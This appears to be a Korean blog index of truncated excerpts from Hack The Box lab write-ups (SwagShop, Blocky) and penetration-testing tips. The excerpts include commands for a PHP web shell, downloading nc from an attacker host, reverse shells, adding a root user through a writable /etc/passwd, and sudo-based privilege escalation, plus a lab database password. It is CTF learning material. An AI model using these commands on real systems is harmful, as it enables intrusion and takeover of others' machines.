Elbrown

SwagShop - 가혹하지만 꼭 풀어보아야하는 문제.- sudo에 대해 잘 이해하고 있는가?- Exploit 디버깅해서 스크립트 수정할 수 있는가?- 스크립트 파일에 대한 설명, 주석에 대해 이해하였는가?- Exploit-DB에 등록된 스크립트는 완벽하지 않다.오래전에 올라온 스크립트라 라이브러리의 EOL같은 문제로 실행이 안될 수 도 있고...실행중인 서비스가 제작자에 의해 커스터마이징되어 특히 경로 부분이 수정될 수 있다.따라서, 이런 부분을 수정해줘야 한다. 디버깅하는 훈련이 필요하다. WriteUphttps://initinfosec.com/writeups/htb/2020/02/01/swagshop-htb-writeup/ 이니셜 쉘 nmap 결과 80포트가 오픈 됨magento 프레임워크를 사용하..

파일전송 TIP * wget 등 여의치 않은 경우 로컬에 존재하는 스크립트 내용을 마우스로 Copy&Paste하여 파일을 생성하면 됨 그외 vim에서 Copy&Paste 클립보드와 연동하는 방법 hyoje420.tistory.com/49 stackoverflow.com/questions/3961859/how-to-copy-to-clipboard-in-vim Exploiting Writeable /etc/passwd 1. /etc/passwd 2. GID가 0인 사용자 존재, 사용자가 passwd파일을 수정할 수 있음 3. 해당 사용자로 로그인 4. 해시 값 생성 openssl passwd -1 -salt [salt] [password] 5. 새로운 루트계정 새로 추가 new:$1$new$p7ptkEKU1..

CMS epploit 후 서버 콘솔에 들어가서 php 심플 쉘 생성 echo ''>c.php Attacking machine(칼리)에서 현재 디렉토리에 nc 가져오기, python 웹 서버 실행 ln -s $(which nc) python3 -m http.server 8000 심플 웹 쉘로 nc다운로드하게 만들기 http://serverip/files/cmd.php?c=wget http://yourip:8000/nc http://serverip/files/cmd.php?c=chmod 755 nc 리버스 쉘 접속 (* 일부 리눅스에 설치된 nc는 위험하기 때문에 -e옵션이 제거 됨, 해당 옵션 안붙이면 무반응) 서버: nc -lnvp 1234 클라: nc -nv -e /bin/bash [ip] SQLlit..

* 리버스 쉘도 여러가지 방법이 있다. - basic이 안된다면 설치된 프로그래밍을 고려하여 다른 방법을 테스트 해보자. * sudo 사용을 통한 권한 상승 * 크론잡이 되는지 확인하는 방법? - 홈 디렉토리 체크 - 최근에 변경된 파일 확인 sudo를 사용해 사용 가능한 권한 sudo -l scriptmanager script 매니저로 변경 sudo -u scriptmanager 콘솔에서할 경우 sudo -u scriptmanager bash -i phpbash Using phpbash to gain a full shell is trivial. Simply using one of many connect-back commands or using phpbash to grab a Meterpreter sta..

Blocky gobuster로 URL 퍼징 10.10.10.37/plugins => jar파일 다운로드 => 리버싱 public String sqlUser = "root"; public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; phpmyadmin 접근 10.10.10.37/phpmyadmin 워드프레스 유저 테이블로 접근하여 notch 관리자 패스워드 변경 10.10.10.37/wp-login.php 관리자 로그인하여 플러그인을 수정하여 리버스 웹쉘로 실행 http://10.10.10.37/wp-includes/themes/akismet/ 웹서버 침투 후 터미널 SU 에러 발생: PHP를 통한 쉘에서 su하면 오류가 발생함 'su' command in Docker r..